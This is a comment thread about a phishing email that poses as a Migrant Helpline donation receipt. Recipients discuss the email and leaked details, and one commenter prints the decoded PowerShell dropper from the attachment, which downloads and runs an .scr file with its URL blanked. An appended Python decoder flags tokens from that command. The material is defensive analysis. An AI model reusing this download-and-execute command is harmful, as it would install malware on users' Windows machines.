spoofed migrant helpline donations delivers malware — 20 Comments

  1. Hello. My elderly mother has just received the same email saying £180 has been deducted from her account. She’s opened the email but has not clicked on the reference link, she’s got Norton anti virus installed. Is there any additional action you recommend she takes? Many thanks

  2. I’ve just received one, too, claiming to be from Migrant Helpline. I haven’t opened it but the top line says “Thank you for choosing to donate to Migrant Helpline”. It’s from an address i n f o @ k o m p o n a v t . r u (have spaced it out, no spaces in actual email address). Definitely scammers, I’ve not donated to Migrant Helpline.

  3. I also received the same email but did not click on the link. I don’t know if it is a coincidence but my iPad Safari is not opening. Would this have any relevance to the above email?

    • That is going to be pure coincidence. These only affect Windows systems at this time. There is nothing in the code that suggests it will affect anything else.

    • Leading 0s are normally missing when the numbers are used from a database. They tend to be stored in the format of country code, which in the UK is 44, then the number with the initial 0 removed. When you dial a number from abroad, you never dial the first 0.
      I don’t suppose you know where you have used that full name & phone number?

  4. Yes indeed, on many/most sites the phone number will be stored that way. Alas, I have used the same details on many sites, so can’t pinpoint the leak, I’m afraid. eBay and PayPal would certainly have them, amongst others. The email was sent to an old email address which I’ve updated in most places, so it seems likely the leak occurred a while ago, perhaps weeks or months. But that’s not definite as there are still a few sites where I haven’t changed it…

  5. I have had the same email. My name and phone number are correct on the email. My first thought was that recently but told me to change my password as their accounts using Yahoo had been hacked and some personal information may have been taken. I try not to give out my full details or telephone number. eBay and PayPal would have them though!

  6. OK, unzipped it in my sandbox.

    It’s base64 but Unicode, so you need to remove the spaces (I did this with notepad, CTRL-H)
    Copying from U A B V and end with = =
    = or == in base64 is padding. All base64 needs to be in 4 byte/character chunks.
    then ran it through

    Decodes to:

    PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object System.Net.WebClient).DownloadFile(“”, “$env:temp\pser4reyou.scr” );Start-Process( “$env:temp\pser4reyou.scr” )

    If you want to encode/decode base64 on the fly, consider using Python.
    Start python
    import base64
    To encode, type
    print(base64.b64encode(b'your string'))
    I like doing
    print(base64.b64encode(b''))
    when they base64 your email address, then paste that in instead.
    Decoding is just as easy
    print(base64.b64decode('eWVzIHlvdSBhcmUgZ2V0dGluZyBpdA=='))
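The manual steps in the comment above (strip the spaces, restore the = padding, decode) as an added Python 3 example; it is not code from the original comment. It assumes the decoded bytes are UTF-16LE, as PowerShell encoded commands are; the function names, the token list and the benign sample command are constructed for illustration.

```python
import base64
import re

# Tokens taken from the decoded command quoted in the comment above.
SUSPICIOUS = ("-executionpolicy bypass", "-noprofile", "downloadfile",
              "start-process", "$env:temp")

# Constructed, harmless sample command (not the one from the email).
SAMPLE_CMD = ('PowerShell -ExecutionPolicy bypass -noprofile '
              '-command Write-Output "constructed sample"')

def clean_blob(raw):
    """Drop spaces, NULs and line breaks left over from UTF-16 text, then fix padding."""
    b64 = re.sub(r"[\s\x00]", "", raw).rstrip("=")
    if re.search(r"[^A-Za-z0-9+/]", b64):
        raise ValueError("not base64 after cleaning")
    if len(b64) % 4 == 1:
        raise ValueError("truncated base64")
    # base64 works in 4-character chunks; '=' pads the last one.
    return b64 + "=" * (-len(b64) % 4)

def decode_payload(raw):
    """Return the decoded text, treating byte/NUL/byte/NUL data as UTF-16LE."""
    data = base64.b64decode(clean_blob(raw), validate=True)
    if len(data) >= 2 and len(data) % 2 == 0 and data[1::2].count(0) > len(data) // 4:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")

def triage(text):
    """List which of the tokens seen in the quoted command appear in the text."""
    low = text.lower()
    return [tok for tok in SUSPICIOUS if tok in low]

def make_sample():
    """Build a constructed blob: UTF-16LE, base64, spaced out, padding lost."""
    b64 = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode("ascii")
    return " ".join(b64.rstrip("="))

if __name__ == "__main__":
    text = decode_payload(make_sample())
    print(text)
    print("flags:", triage(text))
```

Decoding only produces text; nothing in the block executes the recovered command.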

